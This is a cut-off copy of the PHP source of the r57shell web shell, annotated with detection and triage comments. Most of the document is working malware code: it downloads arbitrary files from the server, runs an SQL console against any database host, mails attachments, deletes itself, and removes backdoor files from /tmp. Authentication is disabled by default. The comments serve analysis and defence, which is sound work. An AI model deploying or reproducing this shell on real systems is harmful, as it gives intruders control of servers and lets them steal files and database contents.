1<?php
2/******************************************************************************************************/
3/*
4/* # # # #
5/* # # # #
6/* # # # #
7/* # ## #### ## #
8/* ## ## ###### ## ##
9/* ## ## ###### ## ##
10/* ## ## #### ## ##
11/* ### ############ ###
12/* ########################
13/* ##############
14/* ######## ########## #######
15/* ### ## ########## ## ###
16/* ### ## ########## ## ###
17/* ### # ########## # ###
18/* ### ## ######## ## ###
19/* ## # ###### # ##
20/* ## # #### # ##
21/* ## ##
22/*
23/*
24/*
25/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
26/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
27/* ??????: 1.31
28/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
29/* ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
30/* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
31/* ?? rst@void.ru. ??? ??????????? ????? ???????????.
32/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
33/* (c)oded by 1dt.w0lf
34/* RST/GHC http://rst.void.ru , http://ghc.ru
35/* ANY MODIFIED REPUBLISHING IS RESTRICTED
36/******************************************************************************************************/
37/* ~~~ ????????? | Options ~~~ */
38
39// ????? ????? | Language
40// $language='ru' - ??????? (russian)
41// $language='eng' - english (??????????)
// Operator-editable settings and request bootstrap of the r57shell web shell
// (named in the header banner and in the Basic-auth realm below). The notes in
// this block describe behaviour for triage and detection.
42$language='eng';
43
44// Authentication
45// $auth = 1; - authentication = On
46// $auth = 0; - authentication = Off
// As shipped the value is 0: the HTTP Basic check further down is skipped and any
// client that can request this file reaches the panel.
47$auth = 0;
48
49// Login & Password for access
50// (CHANGE THIS!!!)
51// (Russian-language duplicate of the next line; the text was lost to encoding damage)
52// Login & password crypted with md5, default is 'r57'
// Both values are the same unsalted MD5 hex digest; per the author's comment above
// it corresponds to a publicly documented default credential.
53$name='ec371748dc2da624b35a4f8f685dd122'; // user login (MD5 hex)
54$pass='ec371748dc2da624b35a4f8f685dd122'; // user password (MD5 hex)
55/******************************************************************************************************/
// Turn off PHP error reporting and remove the execution-time limit for this script.
56error_reporting(0);
57set_magic_quotes_runtime(0);
58@set_time_limit(0);
59@ini_set('max_execution_time',0);
60@ini_set('output_buffering',0);
// safe_mode state is read once here; its consumers are outside this chunk.
61$safe_mode = @ini_get('safe_mode');
62$version = '1.31';
// Compatibility shim for PHP older than 4.1.0, which lacks the $_POST/$_GET/... superglobals.
63if(version_compare(phpversion(), '4.1.0') == -1)
64 {
65 $_POST = &$HTTP_POST_VARS;
66 $_GET = &$HTTP_GET_VARS;
67 $_SERVER = &$HTTP_SERVER_VARS;
68 $_COOKIE = &$HTTP_COOKIE_VARS;
69 }
// Undo magic-quotes escaping on POST and COOKIE values (GET is not processed here).
70if (@get_magic_quotes_gpc())
71 {
72 foreach ($_POST as $k=>$v)
73 {
74 $_POST[$k] = stripslashes($v);
75 }
76 foreach ($_COOKIE as $k=>$v)
77 {
78 $_COOKIE[$k] = stripslashes($v);
79 }
80 }
81
// Optional HTTP Basic authentication: the MD5 of the supplied user name and
// password must equal $name and $pass. On failure the script answers 401 with the
// fixed realm "r57shell" and an "Access Denied" body; both strings are static
// and usable as response-side indicators.
82if($auth == 1) {
83if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
84 {
85 header('WWW-Authenticate: Basic realm="r57shell"');
86 header('HTTP/1.0 401 Unauthorized');
87 exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
88 }
89}
// $head: the HTML preamble echoed at the start of the panel views in this file.
// It is one single-quoted string holding the page title "r57shell", a
// windows-1251 charset declaration, inline CSS, and three JavaScript helpers
// (hide_div, show_div, change_divst) that toggle an element's display and store
// the state in a cookie named after the element id. The title and the helper
// names are fixed text, so they can serve as response-body indicators.
90$head = '<!-- ??????????, ???? -->
91<html>
92<head>
93<title>r57shell</title>
94<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
95
96<STYLE>
97tr {
98BORDER-RIGHT: #aaaaaa 1px solid;
99BORDER-TOP: #eeeeee 1px solid;
100BORDER-LEFT: #eeeeee 1px solid;
101BORDER-BOTTOM: #aaaaaa 1px solid;
102color: #000000;
103}
104td {
105BORDER-RIGHT: #aaaaaa 1px solid;
106BORDER-TOP: #eeeeee 1px solid;
107BORDER-LEFT: #eeeeee 1px solid;
108BORDER-BOTTOM: #aaaaaa 1px solid;
109color: #000000;
110}
111.table1 {
112BORDER: 0px;
113BACKGROUND-COLOR: #D4D0C8;
114color: #000000;
115}
116.td1 {
117BORDER: 0px;
118font: 7pt Verdana;
119color: #000000;
120}
121.tr1 {
122BORDER: 0px;
123color: #000000;
124}
125table {
126BORDER: #eeeeee 1px outset;
127BACKGROUND-COLOR: #D4D0C8;
128color: #000000;
129}
130input {
131BORDER-RIGHT: #ffffff 1px solid;
132BORDER-TOP: #999999 1px solid;
133BORDER-LEFT: #999999 1px solid;
134BORDER-BOTTOM: #ffffff 1px solid;
135BACKGROUND-COLOR: #e4e0d8;
136font: 8pt Verdana;
137color: #000000;
138}
139select {
140BORDER-RIGHT: #ffffff 1px solid;
141BORDER-TOP: #999999 1px solid;
142BORDER-LEFT: #999999 1px solid;
143BORDER-BOTTOM: #ffffff 1px solid;
144BACKGROUND-COLOR: #e4e0d8;
145font: 8pt Verdana;
146color: #000000;;
147}
148submit {
149BORDER: buttonhighlight 2px outset;
150BACKGROUND-COLOR: #e4e0d8;
151width: 30%;
152color: #000000;
153}
154textarea {
155BORDER-RIGHT: #ffffff 1px solid;
156BORDER-TOP: #999999 1px solid;
157BORDER-LEFT: #999999 1px solid;
158BORDER-BOTTOM: #ffffff 1px solid;
159BACKGROUND-COLOR: #e4e0d8;
160font: Fixedsys bold;
161color: #000000;
162}
163BODY {
164margin: 1px;
165color: #000000;
166background-color: #e4e0d8;
167}
168A:link {COLOR:red; TEXT-DECORATION: none}
169A:visited { COLOR:red; TEXT-DECORATION: none}
170A:active {COLOR:red; TEXT-DECORATION: none}
171A:hover {color:blue;TEXT-DECORATION: none}
172</STYLE>
173<script language=\'javascript\'>
174function hide_div(id)
175{
176 document.getElementById(id).style.display = \'none\';
177 document.cookie=id+\'=0;\';
178}
179function show_div(id)
180{
181 document.getElementById(id).style.display = \'block\';
182 document.cookie=id+\'=1;\';
183}
184function change_divst(id)
185{
186 if (document.getElementById(id).style.display == \'none\')
187 show_div(id);
188 else
189 hide_div(id);
190}
191</script>';
// In-memory ZIP writer: addFile() appends one deflate-compressed entry and file()
// returns the finished archive as a binary string. In this file it is used by
// compress() for the 'zip' download option.
192class zipfile
193{
 // Local file header plus compressed data, one string per entry.
194 var $datasec = array();
 // Central-directory record, one string per entry.
195 var $ctrl_dir = array();
 // End-of-central-directory signature "PK\x05\x06" followed by four zero bytes.
196 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
 // Byte offset at which the next local file header will start.
197 var $old_offset = 0;
 // Packs a Unix timestamp (0 means "now") into one 32-bit DOS date/time value.
 // Years before 1980 are clamped to 1980-01-01 00:00:00; seconds are stored halved.
198 function unix2DosTime($unixtime = 0) {
199 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
200 if ($timearray['year'] < 1980) {
201 $timearray['year'] = 1980;
202 $timearray['mon'] = 1;
203 $timearray['mday'] = 1;
204 $timearray['hours'] = 0;
205 $timearray['minutes'] = 0;
206 $timearray['seconds'] = 0;
207 }
208 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
209 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
210 }
 // Adds one entry to the archive.
 //   $data - file contents
 //   $name - entry name (backslashes are normalised to '/')
 //   $time - Unix timestamp for the entry, 0 = current time
211 function addFile($data, $name, $time = 0)
212 {
213 $name = str_replace('\\', '/', $name);
214 $dtime = dechex($this->unix2DosTime($time));
 // Re-order the hex digits into four "\xNN" escapes, least-significant byte first,
 // and eval() the result to obtain the four raw bytes.
 // NOTE(review): eval() on a built string; its input here is only the dechex()
 // output. The indexing assumes dechex() returned eight digits - confirm.
215 $hexdtime = '\x' . $dtime[6] . $dtime[7]
216 . '\x' . $dtime[4] . $dtime[5]
217 . '\x' . $dtime[2] . $dtime[3]
218 . '\x' . $dtime[0] . $dtime[1];
219 eval('$hexdtime = "' . $hexdtime . '";');
 // Local file header: "PK\x03\x04", version needed 0x14, flags 0, method 8 (deflate).
220 $fr = "\x50\x4b\x03\x04";
221 $fr .= "\x14\x00";
222 $fr .= "\x00\x00";
223 $fr .= "\x08\x00";
224 $fr .= $hexdtime;
225 $unc_len = strlen($data);
226 $crc = crc32($data);
 // gzcompress() output minus its first 2 and last 4 bytes is stored as the entry data.
227 $zdata = gzcompress($data);
228 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
229 $c_len = strlen($zdata);
230 $fr .= pack('V', $crc);
231 $fr .= pack('V', $c_len);
232 $fr .= pack('V', $unc_len);
233 $fr .= pack('v', strlen($name));
234 $fr .= pack('v', 0);
235 $fr .= $name;
236 $fr .= $zdata;
237 $this -> datasec[] = $fr;
 // Matching central-directory record: "PK\x01\x02", the same time/CRC/size fields,
 // five 16-bit fields (name length, then four zeros), the 32-bit value 32, and the
 // offset of the local header written above.
238 $cdrec = "\x50\x4b\x01\x02";
239 $cdrec .= "\x00\x00";
240 $cdrec .= "\x14\x00";
241 $cdrec .= "\x00\x00";
242 $cdrec .= "\x08\x00";
243 $cdrec .= $hexdtime;
244 $cdrec .= pack('V', $crc);
245 $cdrec .= pack('V', $c_len);
246 $cdrec .= pack('V', $unc_len);
247 $cdrec .= pack('v', strlen($name) );
248 $cdrec .= pack('v', 0 );
249 $cdrec .= pack('v', 0 );
250 $cdrec .= pack('v', 0 );
251 $cdrec .= pack('v', 0 );
252 $cdrec .= pack('V', 32 );
253 $cdrec .= pack('V', $this -> old_offset );
254 $this -> old_offset += strlen($fr);
255 $cdrec .= $name;
256 $this -> ctrl_dir[] = $cdrec;
257 }
 // Returns the complete archive: all local entries, the central directory, then the
 // end-of-central-directory record (entry count twice, directory size, directory
 // offset, and a zero-length trailing field).
258 function file()
259 {
260 $data = implode('', $this -> datasec);
261 $ctrldir = implode('', $this -> ctrl_dir);
262 return
263 $data .
264 $ctrldir .
265 $this -> eof_ctrl_dir .
266 pack('v', sizeof($this -> ctrl_dir)) .
267 pack('v', sizeof($this -> ctrl_dir)) .
268 pack('V', strlen($ctrldir)) .
269 pack('V', strlen($data)) .
270 "\x00\x00";
271 }
272}
// Optionally compresses a download payload in place.
//   $filename - by reference; gets '.bz2', '.gz' or '.zip' appended when a codec is used
//   $filedump - by reference; replaced by the compressed bytes
//   $compress - 'bzip', 'gzip' or 'zip'; any other value leaves the data untouched
// Results are also reported through the globals $mime_type and, for gzip only,
// $content_encoding. A codec is used only if its PHP function exists; otherwise the
// call falls through to the uncompressed 'application/octet-stream' case.
// In this file the selector comes straight from $_POST['compress'] in the
// download_file handler.
273function compress(&$filename,&$filedump,$compress)
274 {
275 global $content_encoding;
276 global $mime_type;
277 if ($compress == 'bzip' && @function_exists('bzcompress'))
278 {
279 $filename .= '.bz2';
280 $mime_type = 'application/x-bzip2';
281 $filedump = bzcompress($filedump);
282 }
283 else if ($compress == 'gzip' && @function_exists('gzencode'))
284 {
285 $filename .= '.gz';
286 $content_encoding = 'x-gzip';
287 $mime_type = 'application/x-gzip';
288 $filedump = gzencode($filedump);
289 }
290 else if ($compress == 'zip' && @function_exists('gzcompress'))
291 {
292 $filename .= '.zip';
293 $mime_type = 'application/zip';
294 $zipfile = new zipfile();
 // substr(..., 0, -4) removes the '.zip' just appended, so the archive entry
 // carries the original file name.
295 $zipfile -> addFile($filedump, substr($filename, 0, -4));
296 $filedump = $zipfile -> file();
297 }
298 else
299 {
300 $mime_type = 'application/octet-stream';
301 }
302 }
// Sends $attach (array with 'type', 'name' and 'content') as a base64 attachment
// via PHP's mail(). Returns 1 if mail() reports success, otherwise 0.
// The whole message, including the encoded payload, is placed in the header
// argument after a blank line; the body argument is an empty string.
// $from, $attach['type'] and $attach['name'] are concatenated into the headers
// without any CR/LF filtering.
// NOTE(review): callers are outside this chunk; presumably this is how the script
// mails files off the host, so outbound mail originating from the web server
// account is worth monitoring - confirm against the rest of the file.
303function mailattach($to,$from,$subj,$attach)
304 {
305 $headers = "From: $from\r\n";
306 $headers .= "MIME-Version: 1.0\r\n";
307 $headers .= "Content-Type: ".$attach['type'];
308 $headers .= "; name=\"".$attach['name']."\"\r\n";
309 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
310 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
311 if(@mail($to,$subj,"",$headers)) { return 1; }
312 return 0;
313 }
// Minimal multi-backend database client. The backend is chosen by the string in
// $db ('MySQL', 'MSSQL', 'PostgreSQL' or 'Oracle'). Every driver call is prefixed
// with @, so driver warnings are suppressed and failures surface only through the
// integer return codes and $error.
// In this file all connection settings are filled from request parameters by the
// db_query handler, i.e. the web server process connects to whatever host the
// request names.
314class my_sql
315 {
316 var $host = 'localhost';
317 var $port = '';
318 var $user = '';
319 var $pass = '';
 // Database name (for Oracle it is passed as the third ocilogon() argument).
320 var $base = '';
 // Backend selector string, see the class comment.
321 var $db = '';
322 var $connection;
 // Last statement/result handle and last error text, both reset by query().
323 var $res;
324 var $error;
 // Filled by get_result(): fetched rows, column names, counters.
325 var $rows;
326 var $columns;
327 var $num_rows;
328 var $num_fields;
 // Filled by dump(): list of output lines.
329 var $dump;
330
 // Opens the connection for the selected backend, applying the default port
 // (3306 / 1433 / 5432) when none is set. Returns 1 on success, 0 if the driver
 // function is missing, the connect fails, or $db is not a known backend.
331 function connect()
332 {
333 switch($this->db)
334 {
335 case 'MySQL':
336 if(empty($this->port)) { $this->port = '3306'; }
337 if(!function_exists('mysql_connect')) return 0;
338 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
339 if(is_resource($this->connection)) return 1;
340 break;
341 case 'MSSQL':
342 if(empty($this->port)) { $this->port = '1433'; }
343 if(!function_exists('mssql_connect')) return 0;
344 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
345 if($this->connection) return 1;
346 break;
347 case 'PostgreSQL':
348 if(empty($this->port)) { $this->port = '5432'; }
 // Connection string is assembled by plain concatenation of the property values.
349 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
350 if(!function_exists('pg_connect')) return 0;
351 $this->connection = @pg_connect($str);
352 if(is_resource($this->connection)) return 1;
353 break;
354 case 'Oracle':
355 if(!function_exists('ocilogon')) return 0;
356 $this->connection = @ocilogon($this->user, $this->pass, $this->base);
357 if(is_resource($this->connection)) return 1;
358 break;
359 }
360 return 0;
361 }
362
 // Selects $base on the open connection. Only MySQL and MSSQL issue a call;
 // PostgreSQL and Oracle return 1 unconditionally. Returns 0 on failure.
363 function select_db()
364 {
365 switch($this->db)
366 {
367 case 'MySQL':
368 if(@mysql_select_db($this->base,$this->connection)) return 1;
369 break;
370 case 'MSSQL':
371 if(@mssql_select_db($this->base,$this->connection)) return 1;
372 break;
373 case 'PostgreSQL':
374 return 1;
375 break;
376 case 'Oracle':
377 return 1;
378 break;
379 }
380 return 0;
381 }
382
 // Runs one statement and stores the handle in $res.
 // Returns 0 on error ($error is set), 1 when a result set is available,
 // 2 when the statement ran without one. The Oracle branch differs: it returns
 // 2 when ocirowcount() is non-zero and 1 otherwise.
383 function query($query)
384 {
385 $this->res=$this->error='';
386 switch($this->db)
387 {
388 case 'MySQL':
 // Every MySQL statement is sent with a leading SQL comment that contains a
 // single NUL byte. The reason is not stated in this file.
 // NOTE(review): presumably aimed at query filtering or logging - confirm.
 // The prefix is constant, so it is a usable signature in MySQL query logs.
389 if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
390 {
391 $this->error = @mysql_error($this->connection);
392 return 0;
393 }
394 else if(is_resource($this->res)) { return 1; }
395 return 2;
396 break;
397 case 'MSSQL':
398 if(false===($this->res=@mssql_query($query,$this->connection)))
399 {
400 $this->error = 'Query error';
401 return 0;
402 }
403 else if(@mssql_num_rows($this->res) > 0) { return 1; }
404 return 2;
405 break;
406 case 'PostgreSQL':
407 if(false===($this->res=@pg_query($this->connection,$query)))
408 {
409 $this->error = @pg_last_error($this->connection);
410 return 0;
411 }
412 else if(@pg_num_rows($this->res) > 0) { return 1; }
413 return 2;
414 break;
415 case 'Oracle':
416 if(false===($this->res=@ociparse($this->connection,$query)))
417 {
418 $this->error = 'Query parse error';
419 }
420 else
421 {
422 if(@ociexecute($this->res))
423 {
424 if(@ocirowcount($this->res) != 0) return 2;
425 return 1;
426 }
 // $error here is a local variable holding the driver's error array.
427 $error = @ocierror();
428 $this->error=$error['message'];
429 }
430 break;
431 }
432 return 0;
433 }
 // Fetches the whole result of the last query() into $rows (associative arrays),
 // sets $num_rows / $num_fields and takes $columns from the keys of the first row.
 // The fetch loops append to $rows inside the loop condition, so the terminating
 // false value is stored as the last element too. Returns 1 if at least one row
 // was counted, else 0.
434 function get_result()
435 {
436 $this->rows=array();
437 $this->columns=array();
438 $this->num_rows=$this->num_fields=0;
439 switch($this->db)
440 {
441 case 'MySQL':
442 $this->num_rows=@mysql_num_rows($this->res);
443 $this->num_fields=@mysql_num_fields($this->res);
444 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
445 @mysql_free_result($this->res);
446 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
447 break;
448 case 'MSSQL':
449 $this->num_rows=@mssql_num_rows($this->res);
450 $this->num_fields=@mssql_num_fields($this->res);
451 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
452 @mssql_free_result($this->res);
453 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
454 break;
455 case 'PostgreSQL':
456 $this->num_rows=@pg_num_rows($this->res);
457 $this->num_fields=@pg_num_fields($this->res);
458 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
459 @pg_free_result($this->res);
460 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
461 break;
462 case 'Oracle':
463 $this->num_fields=@ocinumcols($this->res);
 // Oracle rows are counted while fetching instead of asking the driver.
464 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
465 @ocifreestatement($this->res);
466 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
467 break;
468 }
469 return 0;
470 }
 // Builds a textual dump of one table into $this->dump (array of lines): a '##'
 // comment header with timestamp, database and table name, then one INSERT per row
 // (MySQL also emits the SHOW CREATE TABLE output). Oracle only writes a
 // placeholder line. Returns 1 on success, 0 on empty table name, query failure,
 // empty result or unknown backend.
 // $table is concatenated into the SQL text without escaping.
471 function dump($table)
472 {
473 if(empty($table)) return 0;
474 $this->dump=array();
475 $this->dump[0] = '##';
476 $this->dump[1] = '## --------------------------------------- ';
477 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
478 $this->dump[3] = '## Database: '.$this->base;
479 $this->dump[4] = '## Table: '.$table;
480 $this->dump[5] = '## --------------------------------------- ';
481 switch($this->db)
482 {
483 case 'MySQL':
484 $this->dump[0] = '## MySQL dump';
 // query() adds its own NUL-comment prefix, so these statements carry it twice.
485 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
486 if(!$this->get_result()) return 0;
487 $this->dump[] = $this->rows[0]['Create Table'];
488 $this->dump[] = '## --------------------------------------- ';
489 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
490 if(!$this->get_result()) return 0;
491 for($i=0;$i<$this->num_rows;$i++)
492 {
493 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
494 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
495 }
496 break;
497 case 'MSSQL':
498 $this->dump[0] = '## MSSQL dump';
499 if($this->query('SELECT * FROM '.$table)!=1) return 0;
500 if(!$this->get_result()) return 0;
501 for($i=0;$i<$this->num_rows;$i++)
502 {
503 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
504 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
505 }
506 break;
507 case 'PostgreSQL':
508 $this->dump[0] = '## PostgreSQL dump';
509 if($this->query('SELECT * FROM '.$table)!=1) return 0;
510 if(!$this->get_result()) return 0;
511 for($i=0;$i<$this->num_rows;$i++)
512 {
513 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
514 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
515 }
516 break;
517 case 'Oracle':
518 $this->dump[0] = '## ORACLE dump';
519 $this->dump[] = '## under construction';
520 break;
521 default:
522 return 0;
523 break;
524 }
525 return 1;
526 }
 // Closes the connection of the selected backend; no return value.
527 function close()
528 {
529 switch($this->db)
530 {
531 case 'MySQL':
532 @mysql_close($this->connection);
533 break;
534 case 'MSSQL':
535 @mssql_close($this->connection);
536 break;
537 case 'PostgreSQL':
538 @pg_close($this->connection);
539 break;
540 case 'Oracle':
541 @oci_close($this->connection);
542 break;
543 }
544 }
 // Returns the driver's affected-row count for the last statement, or 0 for an
 // unknown backend. Every branch passes $this->res (the result handle) to the driver.
545 function affected_rows()
546 {
547 switch($this->db)
548 {
549 case 'MySQL':
550 return @mysql_affected_rows($this->res);
551 break;
552 case 'MSSQL':
553 return @mssql_affected_rows($this->res);
554 break;
555 case 'PostgreSQL':
556 return @pg_affected_rows($this->res);
557 break;
558 case 'Oracle':
559 return @ocirowcount($this->res);
560 break;
561 default:
562 return 0;
563 break;
564 }
565 }
566 }
// Request handler: POST cmd=download_file with d_name=<path>.
// The path is taken from the request as-is and opened for reading with no
// directory restriction, so any file readable by the web server account can be
// returned. The optional POST field 'compress' selects the codec in compress().
// On success the response is sent as an attachment named after basename(d_name)
// and the script exits; on failure err() (defined outside this chunk) is called
// and cmd is cleared.
// Detection: POST bodies carrying cmd=download_file together with d_name, and
// attachment responses served by a PHP script that has no download feature.
567if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
568 {
569 if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
570 else
571 {
 // Discard anything already buffered so only the file bytes are sent.
572 @ob_clean();
573 $filename = @basename($_POST['d_name']);
574 $filedump = @fread($file,@filesize($_POST['d_name']));
575 fclose($file);
576 $content_encoding=$mime_type='';
577 compress($filename,$filedump,$_POST['compress']);
578 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
579 header("Content-type: ".$mime_type);
580 header("Content-disposition: attachment; filename=\"".$filename."\";");
581 echo $filedump;
582 exit();
583 }
584 }
// Request handler: GET ?phpinfo - prints the full phpinfo() page followed by a
// BACK link, then stops. $_SERVER['PHP_SELF'] is written into the link unescaped.
585if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
// Request handler: POST cmd=db_query - an SQL console.
// Backend type, server, port, login, password and database all come from the POST
// fields db, db_server, db_port, mysql_l, mysql_p and mysql_db, so the web server
// connects to whichever database host the request names. The db_query field is
// split on ';' and each piece longer than 5 characters is executed in turn.
// Output handling is mixed: the echoed query text, column names and cell values go
// through htmlspecialchars(), while $sql->error, $sql->base and the submitted
// db_query text are written into the page unescaped.
// Detection: this combination of POST field names is specific enough to match on
// in request logs or WAF telemetry where bodies are recorded.
586if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
587 {
588 echo $head;
589 $sql = new my_sql();
590 $sql->db = $_POST['db'];
591 $sql->host = $_POST['db_server'];
592 $sql->port = $_POST['db_port'];
593 $sql->user = $_POST['mysql_l'];
594 $sql->pass = $_POST['mysql_p'];
595 $sql->base = $_POST['mysql_db'];
 // Plain split on ';' - a semicolon inside a string literal also splits the text.
596 $querys = @explode(';',$_POST['db_query']);
597 echo '<body bgcolor=#e4e0d8>';
598 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
599 else
600 {
601 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
602 else
603 {
604 foreach($querys as $num=>$query)
605 {
606 if(strlen($query)>5)
607 {
608 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
 // query() returns integers; the string case labels match through loose comparison.
 // 0 = error, 1 = result set to render, 2 = statement without result set.
609 switch($sql->query($query))
610 {
611 case '0':
612 echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
613 break;
614 case '1':
615 if($sql->get_result())
616 {
617 echo "<table width=100%>";
618 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
619 $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
620 echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
621 for($i=0;$i<$sql->num_rows;$i++)
622 {
623 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
624 $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
625 echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
626 }
627 echo "</table>";
628 }
629 break;
630 case '2':
631 $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
632 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
633 break;
634 }
635 }
636 }
637 }
638 }
 // Re-render the form. The connection settings, including the database password,
 // are written back into the page as hidden fields via in() (defined outside this
 // chunk), so they reappear in every response body and in each follow-up POST.
639 echo "<br><form name=form method=POST>";
640 echo in('hidden','db',0,$_POST['db']);
641 echo in('hidden','db_server',0,$_POST['db_server']);
642 echo in('hidden','db_port',0,$_POST['db_port']);
643 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
644 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
645 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
646 echo in('hidden','cmd',0,'db_query');
647 echo "<div align=center>";
648 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
649 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
650 echo "</form>";
651 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
652 }
// Request handler: GET ?delete - the script removes its own file from disk.
// For responders this means a missing file does not rule out earlier use; web
// access logs (requests to this path, the ?delete request itself) remain the
// evidence source.
653if(isset($_GET['delete']))
654 {
655 @unlink(__FILE__);
656 }
// Request handler: GET ?tmp - removes a fixed list of files under /tmp.
// NOTE(review): these are presumably helper files written by other features of
// the script that are not in this chunk - confirm. The paths are fixed strings
// and can be used as host-side indicators during triage.
657if(isset($_GET['tmp']))
658 {
659 @unlink("/tmp/bdpl");
660 @unlink("/tmp/back");
661 @unlink("/tmp/bd");
662 @unlink("/tmp/bd.c");
663 @unlink("/tmp/dp");
664 @unlink("/tmp/dpc");
665 @unlink("/tmp/dpc.c");
666 }
// Request handler: GET ?phpini - renders every ini directive with its local and
// master value as an HTML table, then stops. Two helper functions are declared
// inside the branch, so they exist only when this handler runs.
667if(isset($_GET['phpini']))
668{
669echo $head;
// Formats one ini value for display: a placeholder for empty values, TRUE/FALSE
// for booleans, 'NULL' for null, print_r() text for arrays and objects; the
// result of the fall-through case is passed to U_wordwrap().
// The first test uses loose ==, so it is evaluated before the bool/null checks.
670function U_value($value)
671 {
672 if ($value == '') return '<i>no value</i>';
673 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
674 if ($value === null) return 'NULL';
675 if (@is_object($value)) $value = (array) $value;
676 if (@is_array($value))
677 {
 // Capture print_r() output through an output buffer.
678 @ob_start();
679 print_r($value);
680 $value = @ob_get_contents();
681 @ob_end_clean();
682 }
683 return U_wordwrap((string) $value);
684 }
// HTML-escapes $str and inserts '<wbr />' break hints every 100 characters; the
// regex then moves a hint that landed inside an entity (&...;) to just after it.
685function U_wordwrap($str)
686 {
687 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
688 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
689 }
690if (@function_exists('ini_get_all'))
